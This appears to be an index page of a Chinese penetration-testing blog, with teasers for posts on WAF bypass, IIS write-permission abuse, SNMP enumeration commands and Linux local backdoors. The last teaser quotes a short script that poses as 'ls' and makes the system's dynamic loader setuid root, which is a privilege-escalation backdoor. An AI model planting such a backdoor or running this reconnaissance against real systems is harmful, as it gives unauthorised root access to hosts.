全部文章

常简单的Python HTTP服务(转)

wangjun 发表于 昨天 23:08

如果你急需一个简单的Web Server,但你又不想去下载并安装那些复杂的HTTP服务程序,比如:Apache,ISS等。那么, Python 可能帮助你。使用Python可以完成一个简单的内建 HTTP 服务器。于是,你可以把你的目录和文件都以HTTP的方式展示出来。佻只需要干一件事情,那就是安装一个Python。

» 阅读全文

发表在: 技术相关 0 条评论 阅读 15 次

常用绕过防注入的11招

wangjun 发表于 2012-01-11, 5:31 PM

在给一些公司做渗透的时候,经常遇到对方服务器前面架设有WAF的情况,也许最终不能成功利用sql注入漏洞,但至少能搞清楚目标服务器是不是有sql注入漏洞.

» 阅读全文

发表在: 渗透测试 0 条评论 阅读 40 次

IIS写权限的利用

wangjun 发表于 2012-01-10, 10:14 PM

很老的一个东西,记录在这里主要是为了方便以后的工作。

» 阅读全文

发表在: 渗透测试 0 条评论 阅读 37 次

snmp信息的使用

wangjun 发表于 2012-01-06, 10:58 PM

常用 SNMP 对象 ID

sysDescr.0                1.3.6.1.2.1.1.1.0
sysObjectID.0             1.3.6.1.2.1.1.2.0
sysUpTime.0              1.3.6.1.2.1.1.3.0
sysContact.0               1.3.6.1.2.1.1.4.0
sysName.0                 1.3.6.1.2.1.1.5.0
sysLocation.0            1.3.6.1.2.1.1.6.0
sysServices.0           1.3.6.1.2.1.1.7.0
ifNumber.0                1.3.6.1.2.1.2.1.0
tcpCurrEstab.0
 
snmpget -v 2c -c public 192.168.21.159 sysName.0
获取设备的名字
 
snmpwalk -v 2c -c public 192.168.21.159
遍历snmp树
 
snmpstatus -v 2c -c public 192.168.21.159
获取简化的系统状态
 
参考文章
发表在: 技术相关 0 条评论 阅读 51 次

继续爆料:linux下留本地后门的两个方法(转)

wangjun 发表于 2012-01-05, 11:08 PM

    公司某群中有人问 bash_profile 里PATH设置成 "." 有啥危害,有人发了这篇文章出来,某大牛发了一段shell脚本。

#!/bin/sh

rm -f ./ls
chmod 4755 /lib64/ld-linux-x86-64.so.2
/bin/ls

 


 

» 阅读全文

发表在: 技术相关 0 条评论 阅读 63 次
Total: 93Page 1 of 191234567Next ›Last »